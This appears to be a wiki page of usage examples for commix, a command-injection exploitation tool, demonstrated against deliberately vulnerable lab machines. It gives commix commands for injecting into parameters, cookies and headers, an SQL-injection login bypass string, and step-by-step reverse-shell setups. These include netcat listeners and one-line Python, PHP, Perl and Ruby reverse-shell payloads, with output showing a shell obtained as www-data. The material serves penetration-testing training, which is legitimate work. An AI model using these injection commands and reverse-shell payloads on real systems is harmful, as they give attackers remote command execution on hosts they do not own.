-
-
Notifications
You must be signed in to change notification settings - Fork 831
Usage Examples
1. Exploiting [Damn Vulnerable Web App] (http://www.dvwa.co.uk/):
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
2. Exploiting [php-Charts 1.0] (http://www.exploit-db.com/exploits/25496/) using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="'" --suffix="//"
3. Exploiting [OWASP Mutillidae] (https://www.owasp.org/index.php/Category:OWASP_Mutillidae) using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
4. Exploiting [Persistence] (https://www.vulnhub.com/entry/persistence-1,103/) using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=INJECT_HERE" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
5. Exploiting [Persistence] (https://www.vulnhub.com/entry/persistence-1,103/) using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=INJECT_HERE" --alter-shell="Python"
6. Exploiting [Kioptrix: Level 1.1 (#2)] (http://www.kioptrix.com/dlvm/Kioptrix_Level_2.rar):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=INJECT_HERE&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
7. Exploiting [Kioptrix: 2014 (#5)] (https://www.vulnhub.com/entry/kioptrix-2014-5,62/) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=INJECT_HERE&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="file-based" --root-dir="/"
8. Exploiting [CVE-2014-6271/Shellshock] (https://pentesterlab.com/exercises/cve-2014-6271):
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
9. Exploiting [commix-testbed (cookie)] (https://github.com/stasinopoulos/commix-testbed/tree/master/cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=INJECT_HERE"
10. Exploiting [commix-testbed (user-agent)] (https://github.com/stasinopoulos/commix-testbed/tree/master/user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --user-agent="INJECT_HERE"
11. Exploiting [commix-testbed (referer)] (https://github.com/stasinopoulos/commix-testbed/tree/master/referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --referer="INJECT_HERE"
12. Exploiting [Flick 2] (https://www.vulnhub.com/entry/flick-2,122/) using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/INJECT_HERE" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
13. Exploiting [commix-testbed (JSON-based)] (https://github.com/stasinopoulos/commix-testbed/tree/master/scenarios/regular/POST) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data="{'addr':'INJECT_HERE','name':'admin'}"
Step 1. Set up a netcat reverse shell.
In a shell on your machine run nc -lvp 1234 to begin listening to inbound connections on port 1234.
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
Step 2. Execute netcat via commix.
In a separate shell, run :
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --os-cmd="nc -e /bin/sh 192.168.178.3 1234"
or
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --os-cmd="/bin/nc.traditional -e /bin/sh 192.168.178.3 1234"
Step 3. Enjoy netcat reverse shell.
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.178.3] from debian [192.168.178.4] 36746
whoami
www-data
In the following examples (which are inspired by Pentestmonkey's post "Reverse Shell Cheat Sheet") we're setting up reverse shells to netcat, without using netcat!! Feel free to add your suggestions!
Step 1. Set up a netcat reverse shell.
In a shell on your machine run nc -lvp 1234 to begin listening to inbound connections on port 1234.
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
Step 2. Choose one of the following netcat-without-netcat reverse shell payloads.
Execute one of the following netcat-without-netcat reverse shell payloads through commix as a command (i.e via the "--os-cmd" option):
1. Python-reverse-shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.178.3\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'
2. PHP-reverse-shell:
php -r '\$sock=fsockopen(\"192.168.178.3\",1234);exec(\"/bin/sh -i <%263 >%263 2>%263\");'
3. Perl-reverse-shell:
perl -e 'use Socket;\$i=\"192.168.178.3\";\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/bin/sh -i\");};'
4. Ruby-reverse-shell:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"192.168.178.3\",1234);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'
Let's suppose that you want a reverse shell on ip "192.168.178.3" and on port "1234" with Python-reverse-shell. Just type in a separate shell the following command :
root@kali:~/Desktop/commix# python commix.py --url="http://192.168.178.4/commix-testbed/scenarios/regular/GET/classic.php?addr=INJECT_HERE" --os-cmd="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.178.3\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
Step 3. Enjoy your netcat-without-netcat reverse shell.
root@kali:~# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.178.3] from debian [192.168.178.4] 43712
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
At the right side panel, you can find detailed information about Commix Project.